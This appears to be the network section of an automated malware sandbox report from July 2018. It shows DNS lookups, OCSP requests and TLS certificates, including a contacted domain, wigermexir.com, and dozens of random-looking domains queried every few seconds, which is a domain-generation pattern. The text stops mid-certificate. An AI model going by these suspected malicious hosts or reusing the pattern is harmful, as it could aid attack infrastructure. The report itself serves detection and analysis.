Jul 4, 2018 14:05:39.356622934 CEST | 60757 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:05:39.374761105 CEST | 53 | 60757 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:05:39.648799896 CEST | 49501 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:05:39.668544054 CEST | 53 | 49501 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:05:40.230839968 CEST | 64253 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:05:40.546510935 CEST | 53 | 64253 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:05:41.862624884 CEST | 49858 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:05:41.898453951 CEST | 53 | 49858 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:05:41.975562096 CEST | 52530 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:05:42.005597115 CEST | 53 | 52530 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:05:42.262593985 CEST | 64838 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:05:42.288446903 CEST | 53 | 64838 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:05:47.267944098 CEST | 57639 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:05:47.297177076 CEST | 53 | 57639 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:05:52.312407017 CEST | 52001 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:05:52.338326931 CEST | 53 | 52001 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:05:57.360927105 CEST | 63078 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:05:57.386904001 CEST | 53 | 63078 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:02.339490891 CEST | 57794 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:02.364025116 CEST | 53 | 57794 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:07.446363926 CEST | 64670 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:07.470928907 CEST | 53 | 64670 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:12.509696007 CEST | 50895 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:12.534456968 CEST | 53 | 50895 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:17.473352909 CEST | 58615 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:17.499186993 CEST | 53 | 58615 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:22.512562037 CEST | 63321 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:22.540262938 CEST | 53 | 63321 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:27.564419985 CEST | 53646 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:27.590655088 CEST | 53 | 53646 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:32.555356979 CEST | 52236 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:32.582084894 CEST | 53 | 52236 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:37.566991091 CEST | 64290 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:37.607074976 CEST | 53 | 64290 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:39.857311964 CEST | 59236 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:39.895287991 CEST | 53 | 59236 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:42.662039995 CEST | 51800 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:42.690570116 CEST | 53 | 51800 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:47.588325977 CEST | 56350 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:47.613600016 CEST | 53 | 56350 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:52.593498945 CEST | 54799 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:52.622417927 CEST | 53 | 54799 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:06:57.642504930 CEST | 49171 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:06:57.680715084 CEST | 53 | 49171 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:07:02.648781061 CEST | 55833 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:02.677544117 CEST | 53 | 55833 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:07:07.652491093 CEST | 63759 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:07.680706978 CEST | 53 | 63759 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:07:12.720355034 CEST | 54679 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:12.745070934 CEST | 53 | 54679 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:07:17.682972908 CEST | 61080 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:17.707748890 CEST | 53 | 61080 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:07:22.702013969 CEST | 60892 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:22.729052067 CEST | 53 | 60892 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:07:27.755734921 CEST | 63619 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:27.783169985 CEST | 53 | 63619 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:07:32.736481905 CEST | 63108 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:32.762871027 CEST | 53 | 63108 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:07:37.729584932 CEST | 65410 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:38.727833986 CEST | 65410 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:38.752954006 CEST | 53 | 65410 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:07:42.817245960 CEST | 55751 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:42.844554901 CEST | 53 | 55751 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:07:47.789988995 CEST | 52796 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:47.815148115 CEST | 53 | 52796 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:07:52.800857067 CEST | 54964 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:52.829034090 CEST | 53 | 54964 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:07:57.857134104 CEST | 60674 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:07:57.882422924 CEST | 53 | 60674 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:08:02.837874889 CEST | 64819 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:08:02.862816095 CEST | 53 | 64819 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:08:07.840035915 CEST | 62562 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:08:07.880552053 CEST | 53 | 62562 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:08:12.922791958 CEST | 49577 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:08:12.948163033 CEST | 53 | 49577 | 8.8.8.8 | 192.168.0.60
Jul 4, 2018 14:08:17.827440977 CEST | 61886 | 53 | 192.168.0.60 | 8.8.8.8
Jul 4, 2018 14:08:17.852802038 CEST | 53 | 61886 | 8.8.8.8 | 192.168.0.60

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 4, 2018 14:05:39.356622934 CEST | 192.168.0.60 | 8.8.8.8 | 0x8f18 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:39.648799896 CEST | 192.168.0.60 | 8.8.8.8 | 0x990a | Standard query (0) | ocsp.pki.goog | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:40.230839968 CEST | 192.168.0.60 | 8.8.8.8 | 0xefb9 | Standard query (0) | wigermexir.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:41.975562096 CEST | 192.168.0.60 | 8.8.8.8 | 0x4438 | Standard query (0) | ocsp.int-x3.letsencrypt.org | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:42.262593985 CEST | 192.168.0.60 | 8.8.8.8 | 0x9c88 | Standard query (0) | nvxij5qutl.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:47.267944098 CEST | 192.168.0.60 | 8.8.8.8 | 0x122f | Standard query (0) | rmqgc5frw3.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:52.312407017 CEST | 192.168.0.60 | 8.8.8.8 | 0x1caa | Standard query (0) | zqvdnvokoq.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:57.360927105 CEST | 192.168.0.60 | 8.8.8.8 | 0x6bc4 | Standard query (0) | pmtz1iirvr.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:02.339490891 CEST | 192.168.0.60 | 8.8.8.8 | 0x2e26 | Standard query (0) | tdgku3qbl1r.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:07.446363926 CEST | 192.168.0.60 | 8.8.8.8 | 0x5b4b | Standard query (0) | ktchyigkk2iwi3.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:12.509696007 CEST | 192.168.0.60 | 8.8.8.8 | 0x28a7 | Standard query (0) | gdelzlc224n5q9.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:17.473352909 CEST | 192.168.0.60 | 8.8.8.8 | 0xcfd9 | Standard query (0) | s4v3xhn3swcbmbc.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:22.512562037 CEST | 192.168.0.60 | 8.8.8.8 | 0x50dc | Standard query (0) | phyrnfojfwiyuz.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:27.564419985 CEST | 192.168.0.60 | 8.8.8.8 | 0xe852 | Standard query (0) | hdylvm3db3ixvi.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:32.555356979 CEST | 192.168.0.60 | 8.8.8.8 | 0x7418 | Standard query (0) | e45cukuntbcou.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:37.566991091 CEST | 192.168.0.60 | 8.8.8.8 | 0x9b7f | Standard query (0) | r5hfff2lnn9mn.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:42.662039995 CEST | 192.168.0.60 | 8.8.8.8 | 0x5455 | Standard query (0) | titz9qqc5szt.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:47.588325977 CEST | 192.168.0.60 | 8.8.8.8 | 0xbad2 | Standard query (0) | fcs1fscxh2oa.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:52.593498945 CEST | 192.168.0.60 | 8.8.8.8 | 0xba2d | Standard query (0) | gj2pexhfy95v.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:57.642504930 CEST | 192.168.0.60 | 8.8.8.8 | 0x3a64 | Standard query (0) | hp1sofo5bnc.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:02.648781061 CEST | 192.168.0.60 | 8.8.8.8 | 0xbb7b | Standard query (0) | tmmq5lcauha.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:07.652491093 CEST | 192.168.0.60 | 8.8.8.8 | 0xc25c | Standard query (0) | hvzaduc42t2o.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:12.720355034 CEST | 192.168.0.60 | 8.8.8.8 | 0x3924 | Standard query (0) | gvyn4bo2n3qq.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:17.682972908 CEST | 192.168.0.60 | 8.8.8.8 | 0x3eb3 | Standard query (0) | hs1agojraguo.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:22.702013969 CEST | 192.168.0.60 | 8.8.8.8 | 0xcb92 | Standard query (0) | erz5yxeblneu.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:27.755734921 CEST | 192.168.0.60 | 8.8.8.8 | 0x16a4 | Standard query (0) | zo4q11gk3iyjgw.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:32.736481905 CEST | 192.168.0.60 | 8.8.8.8 | 0xbc61 | Standard query (0) | 5v95xlfdzrj1de.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:37.729584932 CEST | 192.168.0.60 | 8.8.8.8 | 0x3f5 | Standard query (0) | 4yony3itl9losv.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:38.727833986 CEST | 192.168.0.60 | 8.8.8.8 | 0x3f5 | Standard query (0) | 4yony3itl9losv.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:42.817245960 CEST | 192.168.0.60 | 8.8.8.8 | 0x9ebe | Standard query (0) | tyou23hsrm.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:47.789988995 CEST | 192.168.0.60 | 8.8.8.8 | 0x543a | Standard query (0) | j4rjf2dtjl.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:52.800857067 CEST | 192.168.0.60 | 8.8.8.8 | 0xa687 | Standard query (0) | n5k2ekq2ro.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:57.857134104 CEST | 192.168.0.60 | 8.8.8.8 | 0x3eb0 | Standard query (0) | jdf2xx9wetn.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:08:02.837874889 CEST | 192.168.0.60 | 8.8.8.8 | 0xfb2f | Standard query (0) | 5julzwwlbkrgvm.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:08:07.840035915 CEST | 192.168.0.60 | 8.8.8.8 | 0x7fdf | Standard query (0) | b1l41m3rggg5nz.com | A (IP address) | IN (0x0001)
Jul 4, 2018 14:08:12.922791958 CEST | 192.168.0.60 | 8.8.8.8 | 0x5362 | Standard query (0) | cwug3djg3reoa9.net | A (IP address) | IN (0x0001)
Jul 4, 2018 14:08:17.827440977 CEST | 192.168.0.60 | 8.8.8.8 | 0x8a87 | Standard query (0) | ushy2wtgwvny.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 4, 2018 14:05:39.374761105 CEST | 8.8.8.8 | 192.168.0.60 | 0x8f18 | No error (0) | www.google.com | | 216.58.210.4 | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:39.668544054 CEST | 8.8.8.8 | 192.168.0.60 | 0x990a | No error (0) | ocsp.pki.goog | www3.l.google.com | | CNAME (Canonical name) | IN (0x0001)
Jul 4, 2018 14:05:39.668544054 CEST | 8.8.8.8 | 192.168.0.60 | 0x990a | No error (0) | www3.l.google.com | | 216.58.210.14 | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:40.546510935 CEST | 8.8.8.8 | 192.168.0.60 | 0xefb9 | No error (0) | wigermexir.com | | 212.92.98.68 | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:41.898453951 CEST | 8.8.8.8 | 192.168.0.60 | 0xef33 | No error (0) | a279.dscq.akamai.net | | 23.10.249.146 | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:41.898453951 CEST | 8.8.8.8 | 192.168.0.60 | 0xef33 | No error (0) | a279.dscq.akamai.net | | 23.10.249.168 | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:42.005597115 CEST | 8.8.8.8 | 192.168.0.60 | 0x4438 | No error (0) | ocsp.int-x3.letsencrypt.org | ocsp.int-x3.letsencrypt.org.edgesuite.net | | CNAME (Canonical name) | IN (0x0001)
Jul 4, 2018 14:05:42.005597115 CEST | 8.8.8.8 | 192.168.0.60 | 0x4438 | No error (0) | a771.dscq.akamai.net | | 23.10.249.152 | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:42.005597115 CEST | 8.8.8.8 | 192.168.0.60 | 0x4438 | No error (0) | a771.dscq.akamai.net | | 23.10.249.171 | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:42.288446903 CEST | 8.8.8.8 | 192.168.0.60 | 0x9c88 | Name error (3) | nvxij5qutl.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:47.297177076 CEST | 8.8.8.8 | 192.168.0.60 | 0x122f | Name error (3) | rmqgc5frw3.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:52.338326931 CEST | 8.8.8.8 | 192.168.0.60 | 0x1caa | Name error (3) | zqvdnvokoq.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:05:57.386904001 CEST | 8.8.8.8 | 192.168.0.60 | 0x6bc4 | Name error (3) | pmtz1iirvr.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:02.364025116 CEST | 8.8.8.8 | 192.168.0.60 | 0x2e26 | Name error (3) | tdgku3qbl1r.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:07.470928907 CEST | 8.8.8.8 | 192.168.0.60 | 0x5b4b | Name error (3) | ktchyigkk2iwi3.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:12.534456968 CEST | 8.8.8.8 | 192.168.0.60 | 0x28a7 | Name error (3) | gdelzlc224n5q9.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:17.499186993 CEST | 8.8.8.8 | 192.168.0.60 | 0xcfd9 | Name error (3) | s4v3xhn3swcbmbc.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:22.540262938 CEST | 8.8.8.8 | 192.168.0.60 | 0x50dc | Name error (3) | phyrnfojfwiyuz.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:27.590655088 CEST | 8.8.8.8 | 192.168.0.60 | 0xe852 | Name error (3) | hdylvm3db3ixvi.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:32.582084894 CEST | 8.8.8.8 | 192.168.0.60 | 0x7418 | Name error (3) | e45cukuntbcou.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:37.607074976 CEST | 8.8.8.8 | 192.168.0.60 | 0x9b7f | Name error (3) | r5hfff2lnn9mn.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:39.895287991 CEST | 8.8.8.8 | 192.168.0.60 | 0x97f3 | No error (0) | ctldl.windowsupdate.nsatc.net | ctldl.windowsupdate.com.edgesuite.net | | CNAME (Canonical name) | IN (0x0001)
Jul 4, 2018 14:06:39.895287991 CEST | 8.8.8.8 | 192.168.0.60 | 0x97f3 | No error (0) | a1621.g.akamai.net | | 23.10.249.34 | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:39.895287991 CEST | 8.8.8.8 | 192.168.0.60 | 0x97f3 | No error (0) | a1621.g.akamai.net | | 23.10.249.19 | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:42.690570116 CEST | 8.8.8.8 | 192.168.0.60 | 0x5455 | Name error (3) | titz9qqc5szt.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:47.613600016 CEST | 8.8.8.8 | 192.168.0.60 | 0xbad2 | Name error (3) | fcs1fscxh2oa.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:52.622417927 CEST | 8.8.8.8 | 192.168.0.60 | 0xba2d | Name error (3) | gj2pexhfy95v.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:06:57.680715084 CEST | 8.8.8.8 | 192.168.0.60 | 0x3a64 | Name error (3) | hp1sofo5bnc.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:02.677544117 CEST | 8.8.8.8 | 192.168.0.60 | 0xbb7b | Name error (3) | tmmq5lcauha.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:07.680706978 CEST | 8.8.8.8 | 192.168.0.60 | 0xc25c | Name error (3) | hvzaduc42t2o.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:12.745070934 CEST | 8.8.8.8 | 192.168.0.60 | 0x3924 | Name error (3) | gvyn4bo2n3qq.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:17.707748890 CEST | 8.8.8.8 | 192.168.0.60 | 0x3eb3 | Name error (3) | hs1agojraguo.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:22.729052067 CEST | 8.8.8.8 | 192.168.0.60 | 0xcb92 | Name error (3) | erz5yxeblneu.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:27.783169985 CEST | 8.8.8.8 | 192.168.0.60 | 0x16a4 | Name error (3) | zo4q11gk3iyjgw.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:32.762871027 CEST | 8.8.8.8 | 192.168.0.60 | 0xbc61 | Name error (3) | 5v95xlfdzrj1de.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:38.752954006 CEST | 8.8.8.8 | 192.168.0.60 | 0x3f5 | Name error (3) | 4yony3itl9losv.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:42.844554901 CEST | 8.8.8.8 | 192.168.0.60 | 0x9ebe | Name error (3) | tyou23hsrm.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:47.815148115 CEST | 8.8.8.8 | 192.168.0.60 | 0x543a | Name error (3) | j4rjf2dtjl.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:52.829034090 CEST | 8.8.8.8 | 192.168.0.60 | 0xa687 | Name error (3) | n5k2ekq2ro.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:07:57.882422924 CEST | 8.8.8.8 | 192.168.0.60 | 0x3eb0 | Name error (3) | jdf2xx9wetn.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:08:02.862816095 CEST | 8.8.8.8 | 192.168.0.60 | 0xfb2f | Name error (3) | 5julzwwlbkrgvm.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:08:07.880552053 CEST | 8.8.8.8 | 192.168.0.60 | 0x7fdf | Name error (3) | b1l41m3rggg5nz.com | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:08:12.948163033 CEST | 8.8.8.8 | 192.168.0.60 | 0x5362 | Name error (3) | cwug3djg3reoa9.net | none | none | A (IP address) | IN (0x0001)
Jul 4, 2018 14:08:17.852802038 CEST | 8.8.8.8 | 192.168.0.60 | 0x8a87 | Name error (3) | ushy2wtgwvny.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

  • ocsp.pki.goog
  • ocsp.int-x3.letsencrypt.org

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.0.60 | 49685 | 216.58.210.14 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 4, 2018 14:05:39.680968046 CEST | 4 | OUT | GET /gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.pki.goog
Jul 4, 2018 14:05:39.691977978 CEST | 4 | IN | HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 04 Jul 2018 12:04:58 GMT
Server: ocsp_responder
Content-Length: 468
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=86400
Age: 41
Jul 4, 2018 14:05:39.769212008 CEST | 5 | OUT | GET /GTSGIAG3/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCCCIrzM%2FKFFw%2B HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.pki.goog
Jul 4, 2018 14:05:39.780742884 CEST | 6 | IN | HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 03 Jul 2018 13:51:44 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=86400
Age: 80035


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.0.60 | 49689 | 23.10.249.152 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 4, 2018 14:05:42.016604900 CEST | 136 | OUT | GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgO54qVnGaYpxjBEoQUm57uvQQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.int-x3.letsencrypt.org
Jul 4, 2018 14:05:42.213829994 CEST | 138 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "5972FAB7F0C32338924510B0E1DB743D94E9B7AB7044372CF564AAE88431BEFD"
Last-Modified: Wed, 04 Jul 2018 11:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=43200
Expires: Thu, 05 Jul 2018 00:05:42 GMT
Date: Wed, 04 Jul 2018 12:05:42 GMT
Connection: keep-alive


HTTPS Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Subject | Issuer | Not Before | Not After | Raw
Jul 4, 2018 14:05:39.479382038 CEST | 443 | 49684 | 216.58.210.4 | 192.168.0.60 | CN=www.google.com, O=Google LLC, L=Mountain View, ST=California, C=US | CN=Google Internet Authority G3, O=Google Trust Services, C=US | Tue Jun 19 13:38:49 CEST 2018 | Tue Aug 28 13:31:00 CEST 2018 | (raw certificate dump omitted)
Jul 4, 2018 14:05:39.479382038 CEST | 443 | 49684 | 216.58.210.4 | 192.168.0.60 | CN=Google Internet Authority G3, O=Google Trust Services, C=US | CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2 | Thu Jun 15 02:00:42 CEST 2017 | Wed Dec 15 01:00:42 CET 2021 | (raw certificate dump omitted)
Jul 4, 2018 14:05:41.652049065 CEST | 443 | 49687 | 212.92.98.68 | 192.168.0.60 | CN=wigermexir.com | CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US | Sun Jul 01 12:08:07 CEST 2018 | Sat Sep 29 12:08:07 CEST 2018 | (raw certificate dump omitted)
...`aF.T...J\...00F0: 6C 5B A9 F6 AA 66 5A 73 F4 B5 D2 FC 0A 12 A9 4F l[...fZs.......O]
Jul 4, 2018 14:05:41.652049065 CEST  Src port: 443  Dst port: 49687  Src IP: 212.92.98.68  Dst IP: 192.168.0.60
Subject: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US
Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co.
Not Before: Thu Mar 17 17:40:46 CET 2016
Not After: Wed Mar 17 17:40:46 CET 2021
[[ Version: V3
Subject: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US
Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11
Key: Sun RSA public key, 2048 bits
modulus: 19797248476075437682355852246492227182925025209894527646389863306257272162327717438476096960751529894413137923782807258828237626757946953550223743258656059351948211427799114263948499232121738590221774214131983890556391436336270214266656447169277800971416884432628642288505627878176138101439755752196484972290641499489076846352390454201028735981960275647482014359370041238010607728611828345534572152635280172155598035959878659370929022966413402097129857505568509453268467065766156311136296802046438183697980908977865999500405760226706893415483460747503705792669060406182022181441316967415301631965711690685520847684499
public exponent: 65537
Validity: [From: Thu Mar 17 17:40:46 CET 2016, To: Wed Mar 17 17:40:46 CET 2021]
Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co. 
SerialNumber: [ 0a014142 00000153 85736a0b 85eca708]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://isrg.trustid.ocsp.identrust.com, accessMethod: caIssuers accessLocation: URIName: http://apps.identrust.com/roots/dstrootcax3.p7c]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C4 A7 B1 A4 7B 2C 71 FA DB E1 4B 90 75 FF C4 15 .....,q...K.u...0010: 60 85 89 10 `...]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.identrust.com/DSTROOTCAX3CRL.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 22 68 74 74 70 3A 2F 2F 63 70 73 2E 72 6F 6F ."http://cps.roo0010: 74 2D 78 31 2E 6C 65 74 73 65 6E 63 72 79 70 74 t-x1.letsencrypt0020: 2E 6F 72 67 .org]] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign 